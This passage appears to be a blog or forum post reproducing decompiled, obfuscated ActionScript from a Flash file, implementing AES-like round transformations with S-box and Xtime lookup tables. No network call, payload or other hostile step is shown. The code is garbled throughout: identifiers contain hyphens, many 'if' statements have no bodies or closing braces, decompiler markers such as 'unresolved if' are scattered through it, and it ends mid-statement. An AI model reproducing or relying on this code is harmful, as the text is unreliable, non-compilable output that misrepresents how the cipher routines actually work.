                    _local0._e_-_-_-_[6] = (((_e_-___-_[_local0._e_-___-__[4]] ^ _e_-___-_[_local0._e_-___-__[9]]) ^ Xtime2Sbox[_local0._e_-___-__[14]]) ^ Xtime3Sbox[_local0._e_-___-__[3]]);
                if (_local1){
                    if (_local1){
                    if (_local1){
                    if (!_local2){
                    if (_local1){
                    if (!_local2){
                    _local0._e_-_-_-_[4] = (((Xtime2Sbox[_local0._e_-___-__[4]] ^ Xtime3Sbox[_local0._e_-___-__[9]]) ^ _e_-___-_[_local0._e_-___-__[14]]) ^ _e_-___-_[_local0._e_-___-__[3]]);
                    //unresolved if
                if (_local1){
                if (_local1){
                if (_local1){
                if (!_local2){
                if (!_local2){
                _local0._e_-_-_-_[7] = (((Xtime3Sbox[_local0._e_-___-__[4]] ^ _e_-___-_[_local0._e_-___-__[9]]) ^ _e_-___-_[_local0._e_-___-__[14]]) ^ Xtime2Sbox[_local0._e_-___-__[3]]);
                //unresolved if
                var _temp15 = _local1;
                _local1 = _temp15;
        protected function _e_---_-():void{
            var _local2:Boolean;
            var _local3:Boolean;
            if (_local2){
            var _local1:uint;
            if (!_local2){
                if (_local2){
                this._e_-_-_-_.length = 0;
                if (!_local2){
                    if (!_local3){
                        if (!_local3){
                        if (!_local3){
                        if (_local2){
                        if (_local2){
                        if (_local2){
                        this._e_-_-_-_[4] = (((_e_------[this._e_-___-__[4]] ^ _e_-_-[this._e_-___-__[5]]) ^ _e_--_---[this._e_-___-__[6]]) ^ Xtime9[this._e_-___-__[7]]);
                        //unresolved if
                        //unresolved if
                        var _temp1 = _local2;
                        var _temp2 = _local2;
                        _local2 = _temp2;
                        _local2 = _temp1;
                        if (!_local3){
                        if (!_local3){
                        if (_local2){
                        if (_local2){
                        if (!_local3){
                        this._e_-_-_-_[2] = (((_e_--_---[this._e_-___-__[8]] ^ Xtime9[this._e_-___-__[9]]) ^ _e_------[this._e_-___-__[10]]) ^ _e_-_-[this._e_-___-__[11]]);
                        //unresolved if
                        //unresolved if
                        _local0 = this;
                    if (!_local3){
                    if (!_local3){
                    if (_local2){
                    if (!_local3){
                    if (!_local3){
                    this._e_-_-_-_[0] = (((_e_------[this._e_-___-__[0]] ^ _e_-_-[this._e_-___-__[1]]) ^ _e_--_---[this._e_-___-__[2]]) ^ Xtime9[this._e_-___-__[3]]);
                    //unresolved if
                    if (!_local3){
                        var _temp3 = this;
                        _local0 = this;
                        _local0 = _temp3;
                    if (!_local3){
                    if (_local2){
                    if (_local2){
                    if (!_local3){
                    if (_local2){
                    this._e_-_-_-_[5] = (((Xtime9[this._e_-___-__[0]] ^ _e_------[this._e_-___-__[1]]) ^ _e_-_-[this._e_-___-__[2]]) ^ _e_--_---[this._e_-___-__[3]]);
                    //unresolved if
                    //unresolved if
                    if (_local2){
                    if (_local2){
                    if (!_local3){
                    if (!_local3){
                    if (_local2){
                    this._e_-_-_-_[3] = (((_e_-_-[this._e_-___-__[4]] ^ _e_--_---[this._e_-___-__[5]]) ^ Xtime9[this._e_-___-__[6]]) ^ _e_------[this._e_-___-__[7]]);
                    //unresolved if
                    if (_local2){
                        _local0 = this;
                        if (_local2){
                        if (!_local3){
                        if (_local2){
                        if (_local2){
                        if (!_local3){
                        _local0._e_-_-_-_[11] = (((_e_-_-[_local0._e_-___-__[12]] ^ _e_--_---[_local0._e_-___-__[13]]) ^ Xtime9[_local0._e_-___-__[14]]) ^ _e_------[_local0._e_-___-__[15]]);
                        //unresolved if
                        //unresolved if
                        var _temp4 = _local3;
                        _local3 = _temp4;
                        if (!_local3){
                        if (!_local3){
                        if (!_local3){
                        if (!_local3){
                        if (_local2){
                        _local0._e_-_-_-_[14] = (((_e_--_---[_local0._e_-___-__[4]] ^ Xtime9[_local0._e_-___-__[5]]) ^ _e_------[_local0._e_-___-__[6]]) ^ _e_-_-[_local0._e_-___-__[7]]);
                        //unresolved if
                        //unresolved if
                    if (_local2){
                    if (_local2){
                    if (!_local3){
                    if (_local2){
                    if (!_local3){
                    this._e_-_-_-_[8] = (((_e_------[this._e_-___-__[8]] ^ _e_-_-[this._e_-___-__[9]]) ^ _e_--_---[this._e_-___-__[10]]) ^ Xtime9[this._e_-___-__[11]]);
                    if (!_local2){
                        //unresolved if
                        //unresolved if
                        var _temp5 = this;
                        _local0 = this;
                        _local0 = _temp5;
                        if (_local2){
                        if (_local2){
                        if (!_local3){
                        if (_local2){
                        if (!_local3){
                        _local0._e_-_-_-_[1] = (((Xtime9[_local0._e_-___-__[12]] ^ _e_------[_local0._e_-___-__[13]]) ^ _e_-_-[_local0._e_-___-__[14]]) ^ _e_--_---[_local0._e_-___-__[15]]);
                        //unresolved if
                        //unresolved if
                    //unresolved if
                    //unresolved if
                    var _temp6 = _local2;
                    _local2 = _temp6;
                    if (!_local3){
                    if (_local2){
                    if (!_local3){
                    if (_local2){
                    if (!_local3){
                    this._e_-_-_-_[9] = (((Xtime9[this._e_-___-__[4]] ^ _e_------[this._e_-___-__[5]]) ^ _e_-_-[this._e_-___-__[6]]) ^ _e_--_---[this._e_-___-__[7]]);
                    //unresolved if
                //unresolved if
                _local0 = this;
                if (_local2){
                if (_local2){
                if (_local2){
                if (_local2){
                if (!_local3){
                _local0._e_-_-_-_[7] = (((_e_-_-[_local0._e_-___-__[8]] ^ _e_--_---[_local0._e_-___-__[9]]) ^ Xtime9[_local0._e_-___-__[10]]) ^ _e_------[_local0._e_-___-__[11]]);
                if (!_local2){
                    if (!!(_local3)){
                        //unresolved if
                        var _temp7 = _local1;
                        var _temp8 = _local1;
                        _local1 = _temp8;
                        _local1 = _temp7;
                        if (!_local3){
                        if (_local2){
                        if (_local2){
                        if (_local2){
                        if (!_local3){
                        _local0._e_-_-_-_[13] = (((Xtime9[_local0._e_-___-__[8]] ^ _e_------[_local0._e_-___-__[9]]) ^ _e_-_-[_local0._e_-___-__[10]]) ^ _e_--_---[_local0._e_-___-__[11]]);
                    //unresolved if
                    var _temp9 = _local2;
                    _local2 = _temp9;
                    if (_local2){
                    if (!_local3){
                    if (!_local3){
                    if (_local2){
                    if (_local2){
                    _local0._e_-_-_-_[15] = (((_e_-_-[_local0._e_-___-__[0]] ^ _e_--_---[_local0._e_-___-__[1]]) ^ Xtime9[_local0._e_-___-__[2]]) ^ _e_------[_local0._e_-___-__[3]]);
                    //unresolved if
                    var _temp10 = _local2;
                    _local2 = _temp10;
                    if (_local2){
                    if (_local2){
                    if (_local2){
                    if (_local2){
                    if (!_local3){
                    _local0._e_-_-_-_[12] = (((_e_------[_local0._e_-___-__[12]] ^ _e_-_-[_local0._e_-___-__[13]]) ^ _e_--_---[_local0._e_-___-__[14]]) ^ Xtime9[_local0._e_-___-__[15]]);
                //unresolved if
                var _temp11 = _local0;
                var _temp12 = _local0;
                _local0 = _temp12;
                _local0 = _temp11;
                if (!_local3){
                if (!_local3){
                if (_local2){
                if (_local2){
                if (!_local3){
                _local0._e_-_-_-_[6] = (((_e_--_---[_local0._e_-___-__[12]] ^ Xtime9[_local0._e_-___-__[13]]) ^ _e_------[_local0._e_-___-__[14]]) ^ _e_-_-[_local0._e_-___-__[15]]);
                //unresolved if
            //unresolved if
            _local0 = this;
            if (!_local3){
            if (!_local3){
            if (_local2){
            if (_local2){
            if (_local2){
            _local0._e_-_-_-_[10] = (((_e_--_---[_local0._e_-___-__[0]] ^ Xtime9[_local0._e_-___-__[1]]) ^ _e_------[_local0._e_-___-__[2]]) ^ _e_-_-[_local0._e_-___-__[3]]);
            //unresolved if
            var _temp13 = _local2;
            _local2 = _temp13;
            if (!_local3){
            if (!(_local2)){
                _local1 = 0;
                //unresolved if
                if (!_local3){
                //unresolved jump
                if (!_local3){
                    if (!!(_local3)){
                    //unresolved if
                    //unresolved if
                    var _temp14 = _local2;
                    _local2 = _temp14;
                _local0._e_-___-__[_local1] = _e_---___[_local0._e_-_-_-_[_local1]];
                //unresolved if
            if (!_local3){
            //unresolved if
            if (!_local3){
        protected function _e_-_-_-(_arg1:ByteArray, _arg2:uint):void{
            var _local4:Boolean;
            var _local5:Boolean;
            if (_local4){
            var _local3:uint;
            if (_local5){
                if (_local4){
                //unresolved if
                _local3 = 0;
                //unresolved if
            while (if (!_

Posted by 비타민A